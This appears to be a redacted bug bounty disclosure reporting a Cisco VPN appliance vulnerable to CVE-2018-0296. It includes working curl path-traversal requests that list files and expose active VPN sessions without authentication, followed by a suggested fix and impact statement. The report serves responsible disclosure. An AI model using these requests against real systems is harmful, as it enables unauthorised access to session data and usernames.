[CVE-2018-0296] Cisco VPN path traversal on the https://1████████ (https://████████.███.████████/)

##Description I discovered previously unidentified instance https://1███████ in ████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://1████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` ████████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://1█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error. Example of patched version: ``` curl -i -k "https://███.████.█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ## Impact Path traversal, which can allow the unauthenticated attacker disclose sensitive information such as VPN sessions, files, usernames. Under some conditions it's possible to cacuse DOS attacks